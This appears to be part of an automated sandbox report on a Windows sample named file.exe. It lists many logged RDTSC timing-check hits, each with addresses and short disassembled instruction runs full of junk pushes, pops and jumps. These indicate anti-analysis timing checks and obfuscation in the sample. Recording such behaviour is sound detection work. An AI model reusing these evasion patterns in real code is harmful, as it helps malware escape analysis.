                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61ACC8 second address: 61ACD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnp 00007F91A0D1A3D6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AD30 second address: 61AD3A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F91A12E52F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AE28 second address: 61AE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AEA2 second address: 61AEDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c ja 00007F91A12E52F8h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 nop 0x00000016 mov esi, dword ptr [ebp+122D1A8Fh] 0x0000001c jng 00007F91A12E52FCh 0x00000022 push 00000000h 0x00000024 and cx, 6E9Dh 0x00000029 call 00007F91A12E52F9h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 pop eax 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AEDF second address: 61AEF5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AEF5 second address: 61AF0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B04E second address: 61B053 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AFEC second address: 63B00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F91A12E52FEh 0x0000000c popad 0x0000000d jl 00007F91A12E5302h 0x00000013 jo 00007F91A12E52FCh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639122 second address: 639126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639126 second address: 63912C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63912C second address: 639136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C6F second address: 639C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C75 second address: 639C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C79 second address: 639C83 instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A12E52F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639C83 second address: 639CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F91A0D1A3E4h 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 jmp 00007F91A0D1A3E8h 0x00000016 jmp 00007F91A0D1A3E7h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639E0B second address: 639E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F91A12E52F6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F91A12E52FDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639FEF second address: 63A006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3DCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A006 second address: 63A00C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A00C second address: 63A012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63079D second address: 6307B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F91A12E52F6h 0x0000000d jne 00007F91A12E52F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6307B0 second address: 6307BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605BC2 second address: 605BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F91A12E5300h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 605BDD second address: 605BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AA99 second address: 63AA9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DEBE second address: 63DED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F91A0D1A3D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DED1 second address: 63DED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DED5 second address: 63DEF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EE7A second address: 63EE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EE7E second address: 63EE84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EE84 second address: 63EEA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F91A12E52FBh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnp 00007F91A12E52FEh 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63EEA5 second address: 63EED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007F91A0D1A3DFh 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F91A0D1A3E5h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472A8 second address: 6472AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472AC second address: 6472E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E3h 0x00000007 jmp 00007F91A0D1A3E5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007F91A0D1A3D6h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472E5 second address: 6472E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6472E9 second address: 647303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3DCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jg 00007F91A0D1A3D6h 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647303 second address: 647325 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F91A12E530Dh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647325 second address: 64732B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646660 second address: 64668B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A12E5301h 0x00000009 jmp 00007F91A12E52FCh 0x0000000e popad 0x0000000f pushad 0x00000010 ja 00007F91A12E52F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646972 second address: 64697C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F91A0D1A3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646B0A second address: 646B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646B12 second address: 646B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F91A0D1A3DAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646F91 second address: 646F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 647137 second address: 64713D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64713D second address: 647147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649380 second address: 649396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649396 second address: 64939C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649420 second address: 649424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649424 second address: 649440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6498AC second address: 6498B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64A505 second address: 64A50F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F91A12E52FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B1E9 second address: 64B1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B1F9 second address: 64B246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2B11h], ebx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F91A12E52F8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov dword ptr [ebp+1246EED7h], ebx 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D2B5Eh], ecx 0x00000038 mov edi, 131F450Fh 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jo 00007F91A12E52F8h 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C170 second address: 64C17A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F91A0D1A3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B963 second address: 64B96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C17A second address: 64C1C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2B91h], esi 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D2852h], edx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F91A0D1A3D8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov edi, dword ptr [ebp+122D35F0h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 pop eax 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C1C4 second address: 64C1CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CA29 second address: 64CA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CA38 second address: 64CA3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA54 second address: 64FA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CA3E second address: 64CA48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA58 second address: 64FA69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA69 second address: 64FA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA6F second address: 64FA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA73 second address: 64FA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA77 second address: 64FA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnc 00007F91A0D1A3D6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA8C second address: 64FA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA92 second address: 64FA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65360B second address: 65360F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65360F second address: 653627 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F91A0D1A3E0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6545AA second address: 6545AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6545AE second address: 6545B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655897 second address: 65589B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65589B second address: 6558A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6575AC second address: 6575B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6558A1 second address: 6558A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6558A7 second address: 6558AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6558AB second address: 6558AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6596DE second address: 6596E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6588A7 second address: 6588AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6596E4 second address: 659707 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F91A12E5304h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6588AD second address: 6588B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6589AA second address: 6589AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 660EDD second address: 660EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B893 second address: 65B897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B897 second address: 65B8A1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65EFF1 second address: 65F01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F91A12E5308h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F91A12E52F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 662076 second address: 66208C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F91A0D1A3DCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65B8A1 second address: 65B8AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F91A12E52F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F01A second address: 65F020 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66208C second address: 662091 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664EEC second address: 664F2A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F91A0D1A3D6h 0x0000000d jmp 00007F91A0D1A3DFh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F91A0D1A3E9h 0x0000001a jnc 00007F91A0D1A3D6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666543 second address: 666548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666548 second address: 666552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F91A0D1A3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C8F6 second address: 60C905 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007F91A12E52F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C905 second address: 60C919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007F91A0D1A3DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BCC4 second address: 66BCCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BCCA second address: 66BCD8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F91A0D1A3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6717FA second address: 6717FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6717FE second address: 671802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
